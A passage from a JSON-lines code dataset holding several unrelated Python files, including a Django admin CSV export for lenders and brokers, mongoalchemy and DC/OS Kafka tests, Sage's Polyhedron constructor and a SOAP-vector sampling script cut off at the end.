smart_str(''),\n smart_str('No'),\n smart_str('No'),\n smart_str('No'),\n smart_str('No'),\n ])\n\n if hasattr(lender, 'lenderowneroccupiedre'):\n fields.extend([\n smart_str(bools[lender.lenderowneroccupiedre.office]),\n smart_str(bools[lender.lenderowneroccupiedre.warehouse]),\n smart_str(bools[lender.lenderowneroccupiedre.manufacturing]),\n smart_str(bools[lender.lenderowneroccupiedre.medical]),\n smart_str(bools[lender.lenderowneroccupiedre.mixed_use]),\n smart_str(bools[lender.lenderowneroccupiedre.industrial]),\n smart_str(bools[lender.lenderowneroccupiedre.other]),\n ])\n\n if hasattr(lender, 'lenderinvestmentre'):\n fields.extend([\n smart_str(bools[lender.lenderinvestmentre.office]),\n smart_str(bools[lender.lenderinvestmentre.warehouse]),\n smart_str(bools[lender.lenderinvestmentre.manufacturing]),\n smart_str(bools[lender.lenderinvestmentre.medical]),\n smart_str(bools[lender.lenderinvestmentre.mixed_use]),\n smart_str(bools[lender.lenderinvestmentre.industrial]),\n smart_str(bools[lender.lenderinvestmentre.other]),\n ])\n\n if hasattr(lender, 'lendermultifamilyloan'):\n fields.extend([\n smart_str(bools[lender.lendermultifamilyloan.mf_2to4]),\n smart_str(bools[lender.lendermultifamilyloan.mf_gt4]),\n ])\n\n if hasattr(lender, 'lenderconstructionloan'):\n fields.extend([\n smart_str(bools[lender.lenderconstructionloan.renovation]),\n smart_str(bools[lender.lenderconstructionloan.ground_up_spec]),\n smart_str(bools[lender.lenderconstructionloan.commercial]),\n smart_str(bools[lender.lenderconstructionloan.residential]),\n smart_str(bools[lender.lenderconstructionloan.inv_w_land]),\n smart_str(bools[lender.lenderconstructionloan.oo_w_land]),\n smart_str(bools[lender.lenderconstructionloan.investor]),\n ])\n\n if hasattr(lender, 'lendersbaloan'):\n fields.extend([\n smart_str(bools[lender.lendersbaloan.sba_7a]),\n smart_str(bools[lender.lendersbaloan.sba_504]),\n smart_str(bools[lender.lendersbaloan.CAPline]),\n smart_str(bools[lender.lendersbaloan.micro]),\n smart_str(bools[lender.lendersbaloan.express]),\n smart_str(bools[lender.lendersbaloan.itl]),\n smart_str(bools[lender.lendersbaloan.other]),\n ])\n\n if hasattr(lender, 'lenderhelocloan'):\n fields.extend([\n smart_str(bools[lender.lenderhelocloan.pos_1]),\n smart_str(bools[lender.lenderhelocloan.pos_2]),\n smart_str(bools[lender.lenderhelocloan.pos_3]),\n ])\n\n if hasattr(lender, 'lenderblocloan'):\n fields.extend([\n smart_str(bools[lender.lenderblocloan.resid_prop]),\n smart_str(bools[lender.lenderblocloan.stocks]),\n smart_str(bools[lender.lenderblocloan.savings]),\n smart_str(bools[lender.lenderblocloan.inv_prop]),\n smart_str(bools[lender.lenderblocloan.pos1]),\n smart_str(bools[lender.lenderblocloan.pos2]),\n smart_str(bools[lender.lenderblocloan.equipment]),\n smart_str(bools[lender.lenderblocloan.work_cap]),\n smart_str(bools[lender.lenderblocloan.int_only]),\n smart_str(bools[lender.lenderblocloan.sec_accts_rec]),\n smart_str(bools[lender.lenderblocloan.sec_inv]),\n smart_str(bools[lender.lenderblocloan.re_secure]),\n smart_str(bools[lender.lenderblocloan.re_unsecure]),\n ])\n\n if hasattr(lender, 'lenderbridgeloan'):\n fields.extend([\n smart_str(bools[lender.lenderbridgeloan.bridge]),\n smart_str(bools[lender.lenderbridgeloan.comm_term]),\n smart_str(bools[lender.lenderbridgeloan.usda]),\n smart_str(bools[lender.lenderbridgeloan.stated_inc]),\n ])\n\n\n # XXX could use a refactor here\n lender_qualifiers = []\n\n for q in lender.qualifiers.through.objects.filter(lender_id = lender.id):\n lender_qualifiers.append(q.qualifier_id)\n\n for q_id in sorted(qualifiers):\n if q_id in lender_qualifiers:\n fields.append('Yes')\n else:\n fields.append('No')\n\n\n lender_propertytypes = []\n\n for pt in lender.propertytypes.through.objects.filter(lender_id = lender.id):\n lender_propertytypes.append(pt.propertytype_id)\n\n for pt_id in sorted(propertytypes):\n if pt_id in lender_propertytypes:\n fields.append('Yes')\n else:\n fields.append('No')\n\n writer.writerow(fields)\n # end for\n\n return response\n# end def \n\nexport_lender_csv.short_description = u\"Lender CSV Export\"\n\n# get_name\n# https://stackoverflow.com/questions/163823/can-list-display-in-a-django-modeladmin-display-attributes-of-foreignkey-field\nclass LenderAdmin(admin.ModelAdmin):\n model = Lender\n list_display = ['get_first_name', 'get_last_name']\n actions = [export_lender_csv]\n\n #def get_name(self, obj):\n # return obj.user.first_name + ' ' + obj.user.last_name\n #get_name.admin_order_field = Concat('user__first_name', Value(' '), 'user__last_name')\n\n def get_first_name(self, obj):\n return obj.user.first_name\n\n get_first_name.short_description = 'First Name'\n get_first_name.admin_order_field = 'user__first_name'\n\n def get_last_name(self, obj):\n return obj.user.last_name\n\n get_last_name.short_description = 'Last Name'\n get_last_name.admin_order_field = 'user__last_name'\n\n# end LenderAdmin\n\n# NOTE disabling until fields are fixed\nadmin.site.register(Lender, LenderAdmin)\n\n\n\n\n################################################################################\n# BROKER EXPORT\n################################################################################\ndef export_broker_csv(modeladmin, request, queryset):\n\n date = datetime.datetime.now().date()\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=broker_export_' + str(date) + '.csv'\n writer = csv.writer(response, csv.excel)\n response.write(u'\\ufeff'.encode('utf8')) # BOM (optional...Excel needs it to open UTF-8 file properly)\n\n header = [\n smart_str(u\"Broker First Name\"),\n smart_str(u\"Broker Last Name\"),\n smart_str(u\"Broker Company\"),\n smart_str(u\"Broker Street Address\"),\n smart_str(u\"Broker City\"),\n smart_str(u\"Broker State\"),\n smart_str(u\"Broker Zip Code\"),\n smart_str(u\"Broker Primary Email\"),\n smart_str(u\"Broker Secondary Email\"),\n smart_str(u\"Broker Work Phone\"),\n smart_str(u\"Broker Mobile Phone\"),\n smart_str(u\"Broker Fax Phone\"),\n smart_str(u\"Broker Other Phone\"),\n ]\n\n writer.writerow(\n header\n )\n\n# https://stackoverflow.com/questions/37652520/django-select-related-in-reverse/37792783\n for broker in queryset:\n fields = [\n smart_str(broker.user.first_name),\n smart_str(broker.user.last_name),\n smart_str(broker.company),\n smart_str(broker.user.address),\n smart_str(broker.user.city),\n smart_str(broker.user.state),\n smart_str(broker.user.zip_code),\n smart_str(broker.user.email),\n smart_str(broker.user.email_x),\n smart_str(broker.user.phone_w),\n smart_str(broker.user.phone_m),\n smart_str(broker.user.phone_f),\n smart_str(broker.user.phone_o),\n ]\n\n writer.writerow(fields)\n # end for\n\n return response\n# end def export_broker_csv\n\nexport_broker_csv.short_description = u\"Broker CSV Export\"\n\n# get_name\n# https://stackoverflow.com/questions/163823/can-list-display-in-a-django-modeladmin-display-attributes-of-foreignkey-field\nclass BrokerAdmin(admin.ModelAdmin):\n model = Broker\n list_display = ['get_first_name', 'get_last_name']\n actions = [export_broker_csv]\n\n def get_first_name(self, obj):\n return obj.user.first_name\n\n get_first_name.short_description = 'First Name'\n get_first_name.admin_order_field = 'user__first_name'\n\n def get_last_name(self, obj):\n return obj.user.last_name\n\n get_last_name.short_description = 'Last Name'\n get_last_name.admin_order_field = 'user__last_name'\n\n\nadmin.site.register(Broker, BrokerAdmin)\n","sub_path":"broker/loans/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":23517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"100175572","text":"from nose.tools import *\nfrom mongoalchemy.fields import *\n\nfrom mongoalchemy.exceptions import DocumentException, MissingValueException, ExtraValueException, FieldNotRetrieved, BadFieldSpecification\nfrom mongoalchemy.document import Document, DocumentField, document_type_registry\nfrom mongoalchemy.session import Session\nfrom test.util import known_failure\nfrom datetime import datetime\nfrom bson.dbref import DBRef\n\ndef get_session():\n s = Session.connect('unit-testing')\n s.clear_collection(A)\n s.clear_collection(C)\n return s\n\ndef test_setup():\n document_type_registry.clear()\n\n\nclass A(Document):\n x = IntField()\nclass AA(Document):\n x = IntField()\nclass B(Document):\n y = RefField(DocumentField(A))\nclass C(Document):\n y = RefField(DocumentField(A), autoload=True)\n\n# Field Tests\n\ndef test_reffield():\n\n\n a = A(x=5)\n s = get_session()\n s.insert(a)\n aref = {'$id':a.mongo_id, '$ref':'A'}\n dbref = DBRef(collection='A', id=a.mongo_id)\n\n b = B(y=a)\n assert b.wrap()['y'] == dbref\n\ndef test_wrap_unwrap():\n s = get_session()\n \n a = A(x=5)\n s.insert(a)\n \n aref = {'$id':a.mongo_id, '$ref':'A'}\n dbref = DBRef(database='unit-testing', collection='A', id=a.mongo_id)\n dbref_without_db = DBRef(collection='A', id=a.mongo_id)\n\n f = RefField(DocumentField(A))\n assert f.wrap(a) == f.wrap(f.unwrap(f.wrap(a))), (f.wrap(a), f.wrap(f.unwrap(f.wrap(a))))\n\n\ndef test_wrap():\n s = get_session()\n \n a = A(x=5)\n s.insert(a)\n \n aref = {'$id':a.mongo_id, '$ref':'A'}\n dbref = DBRef(database='unit-testing', collection='A', id=a.mongo_id)\n dbref_without_db = DBRef(collection='A', id=a.mongo_id)\n\n f = RefField(DocumentField(A), simple=True)\n assert f.wrap(a) == a.mongo_id\n\n f = RefField(simple=True, collection='A')\n assert f.wrap(a.wrap()) == a.mongo_id\n\n f = RefField(collection='A')\n assert f.wrap(a.wrap()) == dbref_without_db, (f.wrap(a.wrap()), dbref)\n\n f = RefField(collection='A', db='unit-testing')\n assert f.wrap(a.wrap()) == dbref, (f.wrap(a.wrap()), dbref)\n\ndef test_unwrap():\n s = get_session()\n \n a = A(x=5)\n s.insert(a)\n \n aref = {'$id':a.mongo_id, '$ref':'A'}\n dbaref = DBRef(db='unit-testing', collection='A', id=a.mongo_id)\n\n ret = RefField(DocumentField(A)).unwrap(dbaref)\n assert isinstance(ret, DBRef), ret\n\n ret = RefField(DocumentField(A), simple=True).unwrap(a.mongo_id)\n assert isinstance(ret, DBRef), ret\n\n field = RefField(DocumentField(A), db='unit-testing', simple=True, autoload=True)\n ret = field.unwrap(a.mongo_id, session=s)\n assert isinstance(ret, A), ret\n\n field = RefField(collection='A', db='unit-testing', autoload=True)\n ret = field.unwrap(dbaref, session=s)\n assert ret['_id'] == a.mongo_id\n\n@raises(BadValueException)\ndef test_unwrap_bad_type():\n s = get_session()\n \n a = A(x=5)\n s.insert(a)\n \n aref = {'$id':a.mongo_id, '$ref':'A'}\n dbaref = DBRef(db='unit-testing', collection='A', id=a.mongo_id)\n\n ret = RefField(DocumentField(A)).unwrap(5)\n\n@raises(BadValueException)\ndef test_unwrap_bad_type_extra():\n s = get_session()\n \n a = A(x=5)\n s.insert(a)\n \n aref = {'$id':a.mongo_id, '$ref':'A'}\n dbaref = DBRef(db='unit-testing', collection='A', id=a.mongo_id)\n\n ret = RefField(DocumentField(A)).validate_unwrap(5)\n\n\n\ndef test_document_with_ref():\n s = get_session()\n \n a = A(x=5)\n s.insert(a)\n \n c = C(y=a)\n s.insert(c)\n for c in s.query(C).all():\n assert c.y.x == 5\n\n@raises(BadValueException)\ndef test_document_with_error():\n s = get_session()\n aa = AA(x=4)\n s.insert(aa)\n c = C(y=aa)\n s.insert(c)\n\n@raises(BadValueException)\ndef test_unsaved_ref():\n s = get_session()\n a = A(x=4)\n c = C(y=a)\n s.insert(c)\n\n\n\n\n@raises(BadFieldSpecification)\ndef wrong_type_test():\n class D(Document):\n y = RefField(A)\n\n@raises(BadFieldSpecification)\ndef collection_and_type_test():\n class D(Document):\n y = RefField(DocumentField(A), collection='A')\n","sub_path":"test/test_ref_field.py","file_name":"test_ref_field.py","file_ext":"py","file_size_in_byte":4066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"248480147","text":"\r\nwith open('A-small.in') as f:\r\n\twith open('A-small.out','w') as of:\r\n\t\tt = int(f.readline())\r\n\t\tfor case in range(1,t+1):\r\n\t\t\tn = int(f.readline())\r\n\t\t\tnums = list(map(int,f.readline().split()))\r\n\t\t\ttotalneg = 0\r\n\t\t\tbiggestgap = 0\r\n\t\t\tm2count = 0\r\n\t\t\tfor i in range(n-1):\r\n\t\t\t\tif nums[i] > nums[i + 1]:\r\n\t\t\t\t\tgap = nums[i] - nums[i + 1] \r\n\t\t\t\t\ttotalneg += gap\r\n\t\t\t\t\tif gap > biggestgap:\r\n\t\t\t\t\t\tbiggestgap = gap\r\n\t\t\tcurr = nums[0]\r\n\t\t\tfor i in range(1,n):\r\n\t\t\t\tif curr - biggestgap < 0:\r\n\t\t\t\t\tm2count += curr\r\n\t\t\t\telse:\r\n\t\t\t\t\tm2count += biggestgap\r\n\t\t\t\tcurr = nums[i]\r\n\r\n\t\t\tof.write(\"Case #{}: {} {}\\n\".format(case,totalneg,m2count))","sub_path":"solutions_6404600001200128_0/Python/mmailhot/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"373380244","text":"import unittest\n\nfrom solutions.problem_1_sum_multiples_of_3_and_5.solution_1 import solution_1\nfrom solutions.problem_1_sum_multiples_of_3_and_5.solution_2 import solution_2\nfrom solutions.problem_1_sum_multiples_of_3_and_5.solution_3 import solution_3\nimport timeit, functools\n\n_solutions = [solution_1, solution_2, solution_3]\n\n\nclass MyTestCase(unittest.TestCase):\n def test_benchmark(self):\n _inputs = [100, 200, 400, 800, 1600]\n _times = []\n print(\"Running benchmark...\")\n for _solution in _solutions:\n for input in _inputs:\n _time_execution_function(_solution, input, _times)\n print(\"%s benchmark\" % _solution.__name__)\n _print_benchmark_numbers(_inputs, _times)\n\n\ndef _time_execution_function(solution_func, input, times):\n _time_for_execution_in_seconds = timeit.Timer(functools.partial(solution_func, input)).timeit()\n times.append(_time_for_execution_in_seconds)\n\n\ndef _print_benchmark_numbers(inputs, times):\n for i in range(0, len(inputs)):\n print(\"input: %d, time(s): %d\" % (inputs[i], times[i]))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"solutions/problem_1_sum_multiples_of_3_and_5/tests_benchmark.py","file_name":"tests_benchmark.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"528386293","text":"import dcos.http\nimport inspect\nimport os\nimport pytest\nimport shakedown\n\nfrom tests.test_utils import (\n DEFAULT_TASK_COUNT,\n PACKAGE_NAME,\n check_health,\n get_marathon_config,\n get_deployment_plan,\n marathon_api_url,\n request,\n uninstall,\n spin\n)\n\n\nstrict_mode = os.getenv('SECURITY', 'permissive')\n\n\ndef setup_module(module):\n uninstall()\n\n if strict_mode == 'strict':\n shakedown.install_package_and_wait(\n package_name=PACKAGE_NAME,\n options_file=os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))) + \"/strict.json\")\n else:\n shakedown.install_package_and_wait(\n package_name=PACKAGE_NAME,\n options_file=None)\n\n check_health()\n\n\ndef teardown_module(module):\n uninstall()\n\n\n@pytest.mark.sanity\ndef test_install_worked():\n pass\n\n\n@pytest.mark.sanity\ndef test_bump_metadata_cpus():\n check_health()\n meta_data_ids = get_task_ids('meta-data')\n print('meta-data ids: ' + str(meta_data_ids))\n\n data_ids = get_task_ids('data')\n print('data ids: ' + str(data_ids))\n\n config = get_marathon_config()\n cpus = float(config['env']['METADATA_CPU'])\n config['env']['METADATA_CPU'] = str(cpus + 0.1)\n r = request(\n dcos.http.put,\n marathon_api_url('apps/' + PACKAGE_NAME),\n json=config)\n\n tasks_updated('meta-data', meta_data_ids)\n tasks_not_updated('data', data_ids)\n\n check_health()\n\n\n@pytest.mark.sanity\ndef test_bump_data_nodes():\n check_health()\n\n meta_data_ids = get_task_ids('meta-data')\n print('meta-data ids: ' + str(meta_data_ids))\n\n data_ids = get_task_ids('data')\n print('data ids: ' + str(data_ids))\n\n config = get_marathon_config()\n dataNodeCount = int(config['env']['DATA_COUNT']) + 1\n config['env']['DATA_COUNT'] = str(dataNodeCount)\n r = request(\n dcos.http.put,\n marathon_api_url('apps/' + PACKAGE_NAME),\n json=config)\n\n check_health(DEFAULT_TASK_COUNT + 1)\n tasks_not_updated('meta-data', meta_data_ids)\n tasks_not_updated('data', data_ids)\n\n\ndef get_task_ids(prefix):\n tasks = shakedown.get_service_tasks(PACKAGE_NAME)\n prefixed_tasks = [t for t in tasks if t['name'].startswith(prefix)]\n task_ids = [t['id'] for t in prefixed_tasks]\n return task_ids\n\n\ndef tasks_updated(prefix, old_task_ids):\n def fn():\n try:\n return get_task_ids(prefix)\n except dcos.errors.DCOSHTTPException:\n return []\n\n def success_predicate(task_ids):\n print('Old task ids: ' + str(old_task_ids))\n print('New task ids: ' + str(task_ids))\n success = True\n\n for id in task_ids:\n print('Checking ' + id)\n if id in old_task_ids:\n success = False\n\n if not len(task_ids) >= len(old_task_ids):\n success = False\n\n print('Waiting for update to ' + prefix)\n return (\n success,\n 'Task type:' + prefix + ' not updated'\n )\n\n return spin(fn, success_predicate)\n\n\ndef tasks_not_updated(prefix, old_task_ids):\n def fn():\n try:\n return get_task_ids(prefix)\n except dcos.errors.DCOSHTTPException:\n return []\n\n def success_predicate(task_ids):\n print('Old task ids: ' + str(old_task_ids))\n print('New task ids: ' + str(task_ids))\n success = True\n\n for id in old_task_ids:\n print('Checking ' + id)\n if id not in task_ids:\n success = False\n\n if not len(task_ids) >= len(old_task_ids):\n success = False\n\n print('Determining no update occurred for ' + prefix)\n return (\n success,\n 'Task type:' + prefix + ' not updated'\n )\n\n return spin(fn, success_predicate)\n\n","sub_path":"frameworks/kafka/integration/tests/test_sanity.py","file_name":"test_sanity.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"79057300","text":"r\"\"\"\nPolyhedra\n\nIn this module, a polyhedron is a convex (possibly unbounded) set in\nEuclidean space cut out by a finite set of linear inequalities and\nlinear equations. Note that the dimension of the polyhedron can be\nless than the dimension of the ambient space. There are two\ncomplementary representations of the same data:\n\n**H(alf-space/Hyperplane)-representation**\n This describes a polyhedron as the common solution set of a\n finite number of\n\n * linear inequalities `A \\vec{x} + b \\geq 0`, and\n * linear equations `C \\vec{x} + d \\geq 0`.\n\n\n**V(ertex)-representation**\n The other representation is as the convex hull of vertices (and\n rays and lines to all for unbounded polyhedra) as generators. The\n polyhedron is then the Minkowski sum\n\n .. MATH::\n \n P = \\text{conv}\\{v_1,\\dots,v_k\\} +\n \\sum_{i=1}^m \\RR_+ r_i +\n \\sum_{j=1}^n \\RR \\ell_j\n\n where\n \n * `v_1`, `\\dots`, `v_k` are a finite number of vertices,\n * `r_1`, `\\dots`, `r_m` are generators of rays,\n * and `\\ell_1`, `\\dots`, `\\ell_n` are generators of full lines.\n\n\nA polytope is defined as a bounded polyhedron.\n\nEXAMPLES::\n\n sage: trunc_quadr = Polyhedron(vertices=[[1,0],[0,1]], rays=[[1,0],[0,1]])\n sage: trunc_quadr\n A 2-dimensional polyhedron in QQ^2 defined as the convex hull of 2 vertices and 2 rays\n sage: v = trunc_quadr.vertex_generator().next() # the first vertex in the internal enumeration\n sage: v\n A vertex at (0, 1)\n sage: v.vector()\n (0, 1)\n sage: list(v)\n [0, 1]\n sage: len(v)\n 2\n sage: v[0] + v[1]\n 1\n sage: v.is_vertex()\n True\n sage: type(v)\n \n sage: type( v() )\n \n sage: v.polyhedron()\n A 2-dimensional polyhedron in QQ^2 defined as the convex hull of 2 vertices and 2 rays\n sage: r = trunc_quadr.ray_generator().next()\n sage: r\n A ray in the direction (0, 1)\n sage: r.vector()\n (0, 1)\n sage: [x for x in v.neighbors()]\n [A ray in the direction (0, 1), A ray in the direction (1, 0), A vertex at (1, 0)]\n\nInequalities `A \\vec{x} + b \\geq 0` (and, similarly, equations) are\nspecified by a list ``[b, A]``::\n\n sage: Polyhedron(ieqs = [[0,1,0],[0,0,1],[1,-1,-1]]).Hrepresentation()\n (An inequality (-1, -1) x + 1 >= 0,\n An inequality (1, 0) x + 0 >= 0,\n An inequality (0, 1) x + 0 >= 0)\n\nSee :func:`Polyhedron` for a detailed description of all possible ways\nto construct a polyhedron.\n\nREFERENCES:\n\n Komei Fukuda's `FAQ in Polyhedral Computation\n `_\n\nAUTHORS:\n\n - Marshall Hampton: first version, bug fixes, and various improvements, 2008 and 2009\n - Arnaud Bergeron: improvements to triangulation and rendering, 2008\n - Sebastien Barthelemy: documentation improvements, 2008\n - Volker Braun: refactoring, handle non-compact case, 2009 and 2010\n - Andrey Novoseltsev: added Hasse_diagram_from_incidences, 2010\n - Volker Braun: rewrite to use PPL instead of cddlib, 2011\n\"\"\"\n\n########################################################################\n# Copyright (C) 2008 Marshall Hampton \n# Copyright (C) 2011 Volker Braun \n#\n# Distributed under the terms of the GNU General Public License (GPL)\n#\n# http://www.gnu.org/licenses/\n########################################################################\n\nfrom sage.rings.all import QQ, ZZ, RDF\nfrom sage.misc.decorators import rename_keyword\n\nfrom misc import (\n _set_to_None_if_empty, _set_to_empty_if_None,\n _common_length_of )\n\n\n\n \n\n\n#########################################################################\n@rename_keyword(deprecated='Sage version 4.7.2', field='base_ring')\ndef Polyhedron(vertices=None, rays=None, lines=None,\n ieqs=None, eqns=None,\n base_ring=QQ, minimize=True, verbose=False,\n backend=None):\n \"\"\"\n Construct a polyhedron object.\n\n You may either define it with vertex/ray/line or\n inequalities/equations data, but not both. Redundant data will\n automatically be removed (unless ``minimize=False``), and the\n complementary representation will be computed.\n\n INPUT:\n\n - ``vertices`` -- list of point. Each point can be specified as\n any iterable container of ``base_ring`` elements.\n \n - ``rays`` -- list of rays. Each ray can be specified as any\n iterable container of ``base_ring`` elements.\n \n - ``lines`` -- list of lines. Each line can be specified as any\n iterable container of ``base_ring`` elements.\n\n - ``ieqs`` -- list of inequalities. Each line can be specified as\n any iterable container of ``base_ring`` elements.\n\n - ``eqns`` -- list of equalities. Each line can be specified as\n any iterable container of ``base_ring`` elements.\n\n - ``base_ring`` -- either ``QQ`` or ``RDF``. The field over which\n the polyhedron will be defined. For ``QQ``, exact arithmetic\n will be used. For ``RDF``, floating point numbers will be\n used. Floating point arithmetic is faster but might give the\n wrong result for degenerate input.\n\n - ``backend`` -- string or ``None`` (default). The backend to use. Valid choices are\n\n * ``'cddr'``: cdd (:mod:`~sage.geometry.polyhedron.backend_cdd`)\n with rational coefficients\n\n * ``'cddf'``: cdd with floating-point coefficients\n\n * ``'ppl'``: use ppl\n (:mod:`~sage.geometry.polyhedron.backend_ppl`) with `\\QQ`\n coefficients.\n\n Some backends support further optional arguments:\n\n - ``minimize`` -- boolean (default: ``True``). Whether to\n immediately remove redundant H/V-representation data. Currently\n not used.\n\n - ``verbose`` -- boolean (default: ``False``). Whether to print\n verbose output for debugging purposes. Only supported by the cdd\n backends.\n\n OUTPUT:\n\n The polyhedron defined by the input data.\n\n EXAMPLES:\n\n Construct some polyhedra::\n\n sage: square_from_vertices = Polyhedron(vertices = [[1, 1], [1, -1], [-1, 1], [-1, -1]])\n sage: square_from_ieqs = Polyhedron(ieqs = [[1, 0, 1], [1, 1, 0], [1, 0, -1], [1, -1, 0]])\n sage: list(square_from_ieqs.vertex_generator())\n [A vertex at (1, -1),\n A vertex at (1, 1),\n A vertex at (-1, 1),\n A vertex at (-1, -1)]\n sage: list(square_from_vertices.inequality_generator())\n [An inequality (1, 0) x + 1 >= 0,\n An inequality (0, 1) x + 1 >= 0,\n An inequality (-1, 0) x + 1 >= 0,\n An inequality (0, -1) x + 1 >= 0]\n sage: p = Polyhedron(vertices = [[1.1, 2.2], [3.3, 4.4]], base_ring=RDF)\n sage: p.n_inequalities()\n 2\n\n The same polyhedron given in two ways::\n\n sage: p = Polyhedron(ieqs = [[0,1,0,0],[0,0,1,0]])\n sage: p.Vrepresentation()\n (A line in the direction (0, 0, 1),\n A ray in the direction (1, 0, 0),\n A ray in the direction (0, 1, 0),\n A vertex at (0, 0, 0))\n sage: q = Polyhedron(vertices=[[0,0,0]], rays=[[1,0,0],[0,1,0]], lines=[[0,0,1]])\n sage: q.Hrepresentation()\n (An inequality (1, 0, 0) x + 0 >= 0,\n An inequality (0, 1, 0) x + 0 >= 0)\n\n Finally, a more complicated example. Take `\\mathbb{R}_{\\geq 0}^6` with\n coordinates `a, b, \\dots, f` and\n\n * The inequality `e+b \\geq c+d`\n * The inequality `e+c \\geq b+d`\n * The equation `a+b+c+d+e+f = 31`\n \n ::\n\n sage: positive_coords = Polyhedron(ieqs=[\n ... [0, 1, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0],\n ... [0, 0, 0, 0, 1, 0, 0], [0, 0, 0, 0, 0, 1, 0], [0, 0, 0, 0, 0, 0, 1]])\n sage: P = Polyhedron(ieqs=positive_coords.inequalities() + [\n ... [0,0,1,-1,-1,1,0], [0,0,-1,1,-1,1,0]], eqns=[[-31,1,1,1,1,1,1]])\n sage: P\n A 5-dimensional polyhedron in QQ^6 defined as the convex hull of 7 vertices\n sage: P.dim()\n 5\n sage: P.Vrepresentation()\n (A vertex at (31, 0, 0, 0, 0, 0), A vertex at (0, 0, 0, 0, 0, 31),\n A vertex at (0, 0, 0, 0, 31, 0), A vertex at (0, 0, 31/2, 0, 31/2, 0),\n A vertex at (0, 31/2, 31/2, 0, 0, 0), A vertex at (0, 31/2, 0, 0, 31/2, 0),\n A vertex at (0, 0, 0, 31/2, 31/2, 0))\n\n .. NOTE::\n \n * Once constructed, a ``Polyhedron`` object is immutable.\n * Although the option ``field=RDF`` allows numerical data to\n be used, it might not give the right answer for degenerate\n input data - the results can depend upon the tolerance\n setting of cdd.\n \"\"\"\n # Clean up the arguments\n vertices = _set_to_None_if_empty(vertices)\n rays = _set_to_None_if_empty(rays)\n lines = _set_to_None_if_empty(lines)\n ieqs = _set_to_None_if_empty(ieqs)\n eqns = _set_to_None_if_empty(eqns)\n\n got_Vrep = (vertices is not None or rays is not None or lines is not None)\n got_Hrep = (ieqs is not None or eqns is not None)\n \n if got_Vrep and got_Hrep:\n raise ValueError('You cannot specify both H- and V-representation.')\n elif got_Vrep:\n vertices = _set_to_empty_if_None(vertices)\n rays = _set_to_empty_if_None(rays)\n lines = _set_to_empty_if_None(lines)\n Vrep = [vertices, rays, lines]\n Hrep = None\n ambient_dim = _common_length_of(*Vrep)[1]\n elif got_Hrep:\n ieqs = _set_to_empty_if_None(ieqs)\n eqns = _set_to_empty_if_None(eqns)\n Vrep = None\n Hrep = [ieqs, eqns]\n ambient_dim = _common_length_of(*Hrep)[1] - 1\n else:\n Vrep = None\n Hrep = None\n ambient_dim = 0\n\n if backend is not None:\n if backend=='ppl':\n from backend_ppl import Polyhedron_QQ_ppl\n return Polyhedron_QQ_ppl(ambient_dim, Vrep, Hrep, minimize=minimize)\n if backend=='cddr':\n from backend_cdd import Polyhedron_QQ_cdd\n return Polyhedron_QQ_cdd(ambient_dim, Vrep, Hrep, verbose=verbose)\n if backend=='cddf':\n from backend_cdd import Polyhedron_RDF_cdd\n return Polyhedron_RDF_cdd(ambient_dim, Vrep, Hrep, verbose=verbose)\n\n if base_ring is QQ:\n from backend_ppl import Polyhedron_QQ_ppl\n return Polyhedron_QQ_ppl(ambient_dim, Vrep, Hrep, minimize=minimize)\n elif base_ring is RDF:\n from backend_cdd import Polyhedron_RDF_cdd\n return Polyhedron_RDF_cdd(ambient_dim, Vrep, Hrep, verbose=verbose)\n else:\n raise ValueError('Polyhedron objects can only be constructed over QQ and RDF')\n\n\n\n\n\n","sub_path":"sage/geometry/polyhedron/constructor.py","file_name":"constructor.py","file_ext":"py","file_size_in_byte":10751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"616641200","text":"#!/usr/bin/python\n\nimport os\nimport sys\nimport argparse\nimport random\nimport quippy as qp\nimport numpy as np\nimport SOAPTools\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-soap', type=str, default='SOAPFiles.dat', \n help='File containing SOAP vectors')\nparser.add_argument('-fps', type=int, default=0, \n help='Number of SOAP components to select via FPS')\nparser.add_argument('-qfps', type=float, default=0, \n help='Cutoff for Quick FPS')\nparser.add_argument('-nr', type=int, default=0, \n help='Number of random indices to select')\nparser.add_argument('-c', action='store_true', \n help='Select on components')\nparser.add_argument('-output', type=str, default='.',\n help='Directory where outputs should be saved')\n\nargs = parser.parse_args()\n\n# Read input file containing list of files that contain SOAP vectors\nf = open(args.soap, 'r')\ninputFiles = f.readlines()\ninputFiles = [i.strip() for i in inputFiles]\n\n# Can only do batch processing on environments, not components\nif len(inputFiles) > 1 and args.c:\n sys.exit('Cannot select components reliably with batched data')\n\n# Concatenate the SOAP vectors from the separate files\nsubFPS = []\nfileIDs = []\nnewIdxs = []\n\nn = 0\nnEnv = 0\n\n# Loop over the batches\n# and do FPS for each batch\nfor idx, i in enumerate(inputFiles):\n sys.stdout.write('Reading SOAPs in batch %d...\\n' % (idx+1))\n if os.path.splitext(i)[1] == '.npy':\n SOAP = np.load(i)\n else:\n SOAP = np.loadtxt(i)\n\n # Transpose SOAP vectors if selecting on components\n # Use SOAP vectors as-is if selecting environments\n if args.c:\n SOAP = SOAP.T\n \n # Do \"quick FPS\"\n if args.qfps > 0:\n idxs = SOAPTools.quick_FPS(SOAP.T, D=args.fps, cutoff=args.qfps)\n newIdxs.append(idxs+nEnv)\n subFPS.append(SOAP[idxs])\n \n # Do FPS\n elif args.fps > 0:\n idxs = SOAPTools.do_FPS(SOAP, D=args.fps)\n newIdxs.append(idxs+nEnv)\n subFPS.append(SOAP[idxs])\n\n nEnv += len(SOAP)\n\n# Take our FPS points for each batch,\n# and do another FPS on the concatenated\n# subselection\nif len(subFPS) 